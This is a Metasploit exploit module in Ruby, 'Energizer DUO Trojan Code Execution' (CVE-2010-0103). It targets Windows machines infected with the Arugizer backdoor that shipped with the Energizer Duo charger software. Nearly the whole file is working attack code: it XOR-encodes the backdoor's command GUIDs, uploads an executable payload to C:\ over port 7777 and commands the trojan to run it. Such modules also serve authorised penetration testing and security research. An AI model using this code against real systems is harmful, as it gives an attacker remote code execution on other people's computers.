##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Energizer DUO Trojan Code Execution',
			'Description'    => %q{
				This module will execute an arbitrary payload against
			any system infected with the Arugizer trojan horse. This
			backdoor was shipped with the software package accompanying
			the Energizer Duo USB battery charger.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 8749 $',
			'References'     =>
				[
					['CVE', '2010-0103'],
					['URL', 'http://www.kb.cert.org/vuls/id/154421']
				],
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Automatic', { } ],
				],
			'DefaultTarget'  => 0
			))


		register_options(
			[
				Opt::RPORT(7777),
			], self.class)
	end

	def trojan_encode(str)
		str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")
	end

	def trojan_command(cmd)
		cid = ""

		case cmd
		when :exec
			cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"
		when :dir
			cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"
		when :write
			cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"
		when :read
			cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"
		when :nop
			cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"
		when :find
			cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"
		when :yes
			cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"
		when :runonce
			cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"
		when :delete
			cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
		end

		trojan_encode(
			[cid.length + 1].pack("V") + cid  + "\x00"
		)
	end

	def exploit

		nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"
		exe = Msf::Util::EXE.to_win32pe(framework,payload.encoded) + "\x00"


		print_status("Trying to upload #{nam}...")
		connect

		# Write file request
		sock.put(trojan_command(:write))
		sock.put(trojan_encode([nam.length].pack("V")))
		sock.put(trojan_encode(nam))
		sock.put(trojan_encode([exe.length].pack("V")))
		sock.put(trojan_encode(exe))

		# Required to prevent the server from spinning a loop
		sock.put(trojan_command(:nop))

		disconnect

		#
		# Execute the payload
		#

		print_status("Trying to execute #{nam}...")

		connect

		# Execute file request
		sock.put(trojan_command(:exec))
		sock.put(trojan_encode([nam.length].pack("V")))
		sock.put(trojan_encode(nam))

		# Required to prevent the server from spinning a loop
		sock.put(trojan_command(:nop))

		disconnect
	end
end